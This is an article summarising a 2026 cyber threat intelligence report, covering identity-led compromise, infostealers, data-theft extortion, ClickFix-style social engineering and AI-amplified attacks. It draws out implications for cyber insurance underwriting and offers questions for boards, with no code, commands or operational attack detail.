The 2026 Threat Landscape: Same tactics, new speed
11th June 2026Bridewell’s 2026 Cyber Threat Intelligence Report shows a world where attackers are mostly doing the same things, but doing them faster, more quietly, and with far better use of identity, trusted platforms and AI.
The report paints a clear picture, the most important shifts in cyber security are not the noisiest headlines, but the quiet optimisation of tactics that already work. Offensive security tooling, information stealers, ransomware affiliates, social engineering and abuse of trusted platforms remain central, but adversaries are now using them with greater speed, adaptability and resilience.
For security and risk leaders, the question is no longer “What new attack we haven’t seen before should we fear?” but “How quickly can we detect and contain the well-known tactics that are now weaponised at machine speed?”
Identity led compromise at the centre of attacks
Bridewell highlight’s identity led compromise as a central theme in modern intrusions, spanning stolen credentials, session tokens, OAuth abuse and compromise of non-human identities such as service accounts and API keys. This mirrors findings from CrowdStrike’s 2026 Global Threat Report, which notes that most adversaries are “logging in, not breaking in,” and that 82% of detections are now malware‑free, leaning heavily on identity and legitimate tools.
In plain language, attackers increasingly win by pretending to be you or your systems, not by dropping obvious malware.
For technical teams, the shifts focuses toward:
- Stronger authentication and phishing‑resistant MFA for high‑value accounts
- Session management and token protection
- Governance for service accounts, API keys and OAuth grants
For boards, the key question becomes, Do we have a clear view of who and what can access our systems, and how quickly could we spot an attacker using valid credentials?
Information stealers as the fuel for downstream crime
Bridewell emphasises that information stealing malware continues to fuel ransomware, initial access brokerage and broader cybercrime. Stolen browser data, cookies, and password vaults provide attackers with ready‑made access paths into organisations and personal accounts.
Similar patterns are reported in threat assessments from NJCCIC and other government bodies, which highlight theft and abuse of login credentials as one of the most persistent threats heading into 2026.
The takeaway is simple: “small” infostealer incidents are rarely small. They are often the first step in a much larger breach or extortion event.
Ransomware fragmentation and data-theft-first extortion
Bridewell notes that ransomware is fragmenting, with data theft increasingly rivalling or even replacing encryption as the main extortion lever. This is consistent with multiple 2026 threat reports that observe declining ransom payments but sustained, or even rising, data theft and extortion attempts.
Not every “ransomware” incident will involve full-scale encryption. Attackers may exfiltrate data quietly, then threaten publication, regulatory notification, or attack your customers and partners. This means impact is less about “can we restore from backup?” and more about “what was taken, who is affected, and how will regulators, customers and markets react?”
Social engineering: ClickFix, ConsentFix and beyond
The report highlights evolving social engineering, including techniques such as ClickFix, FileFix and ConsentFix. These lures often encourage users to “fix” a problem by running scripts, accepting permissions, or granting OAuth consent that silently establishes attacker persistence.
This aligns with other research (e.g., Red Canary’s 2026 Threat Detection Report) showing increased use of “trusted” workflows, browser prompts, cloud consent screens, IT‑style support messages, to bypass traditional filters.
Attackers are getting better at looking like routine IT or cloud admin flows, not just sending obvious phishing emails.
Abuse of trusted platforms and cloud services
Bridewell underscores that trusted platforms, cloud services and first‑party applications are now part of the attack chain, not just targets. Attackers host infrastructure on reputable providers, hide command‑and‑control behind legitimate services, and leverage built‑in automation and integrations to move laterally.
CrowdStrike and Google Cloud’s 2026 Cybersecurity Forecast similarly highlight increased exploitation of cloud environments, edge devices and virtualisation infrastructure, with threat actors exploiting visibility gaps between identity, cloud and endpoint layers.
The tools you rely on to run your business, SaaS platforms, cloud services, collaboration tools, can and are being used against you if controls and monitoring are weak.
AI as an amplifier, not a magic new threat
The report stresses that AI is amplifying attacker capability by accelerating reconnaissance, exploit development, social engineering and scale. This echoes the 2026 Verizon DBIR and CrowdStrike reports, which document AI‑enabled adversaries increasing attack speed, efficiency and the volume of campaigns.
Key nuances:
- AI primarily makes existing tactics faster and more scalable.
- It also introduces new exposure where organisations use AI tools without proper governance (“Shadow AI”) which is becoming a growing issue.
Infrastructure agility and resilience
Bridewell emphasises that adversary infrastructure, hosting, C2 frameworks, rotation patterns, is evolving to be more agile, making it harder to track and takedown. This supports the broader trend of attackers using commodity infrastructure, fast‑flux techniques (attackers constantly changing the IP addresses behind malicious domains), and layered services to stay ahead of static blocklists and slow‑moving defenders.
This underscores the need for:
- Threat intelligence that tracks infrastructure patterns over time.
- Detection that focuses on behaviour and anomalies, not just static indicators.
These findings, combined with other 2026 threat and insurance market reports, have direct implications for how cyber insurance views and prices risk.
Identity, not just perimeter, as a core risk dimension
Given the prominence of identity‑led compromise, the cyber insurance market should treat identity security as a primary rating factor, not a secondary control.
Key underwriting questions and metrics:
- Use of phishing‑resistant MFA (e.g., FIDO2, WebAuthn) for admins and remote access.
- Coverage and governance of service accounts and machine identities.
- Controls around SSO, OAuth consent governance and session management.
Treat infostealers and “small” compromises as leading indicators
With information stealers feeding initial access and ransomware, underwriters should probe how insureds detect and respond to infostealer infections.
How quickly can the organisation identify, and revoke credentials and tokens exposed by infostealers?
Is there playbook‑driven response when infostealer logs containing corporate credentials appear in criminal markets?
Ransomware: price for resilience, not ransom
Given the fragmentation of ransomware and the rise of data‑theft‑first extortion, insurance should place more emphasis on resilience than on the expectation of ransom payment.
- Backup and recovery maturity (segmentation, offline copies, test frequency, realistic RTO/RPO).
- Data classification and minimisation (limiting the blast radius of data theft).
- Crisis communications, regulatory response and business continuity capabilities.
Social engineering and business process controls
With techniques like ClickFix and ConsentFix, the line between “technical” and “business process” risk is blurring.
Strength of out‑of‑band verification for high‑risk actions (payment changes, access elevation, vendor onboarding).
Breadth and realism of awareness training (beyond email phishing to cover mobile, chat, and cloud consent prompts).
Use of just‑in‑time prompts or transaction‑level controls for sensitive actions
This aligns with broader findings that human factors continue to dominate breach statistics, but now across more channels.
Cloud, trusted platforms and supply chain as standard exposure, not exceptions
As trusted platforms and cloud services become active components of attack chains, cyber insurance needs to embed supply‑chain and SaaS risk more explicitly in models.
- Inventory and criticality of SaaS and cloud services, including AI platforms.
- Vendor due diligence and continuous monitoring for key providers.
- Segmentation and access controls for integrations (APIs, connectors, automation tools).
This is consistent with 2026 sectoral and threat reports noting cloud environments as the most common entry point and regulation as a key driver of improved security, particularly in critical infrastructure and high‑regulation sectors.
Metrics that matter for pricing and capacity
Drawing from Bridewell and corroborating studies, the 2026 message across Bridewell, Verizon, CrowdStrike and others is consistent. The fundamentals still matter most, but they must be executed faster and across a broader, more identity‑ and cloud‑centric ecosystem.
- Mean/median time to remediate critical and known exploited vulnerabilities.
- Adoption of phishing‑resistant MFA on critical paths.
- Proportion of identities and endpoints covered by EDR/XDR with 24/7 monitoring.
- Proportion of workforce using sanctioned, governed AI tools vs unsanctioned ones.
- Frequency and scope of scenario‑based exercises (ransomware, SaaS compromise, cloud account takeover).
These metrics better reflect how an organisation will fare against the fast‑moving, identity‑led, AI‑enabled threats described in Bridewell’s report.
Three practical questions a board can ask:
How quickly can we detect and contain identity misuse, whether by a human attacker or a malicious tool, across our key systems?
Which of our business‑critical processes (payments, access changes, data publishing) rely on a single, easily spoofed channel, and how are we hardening them?
Where are we still operating on monthly or quarterly cycles (patching, vendor reviews, control assurance) in a world where attackers iterate daily?
See the full report here: Cyber Threat Intelligence Report 2026 | Bridewell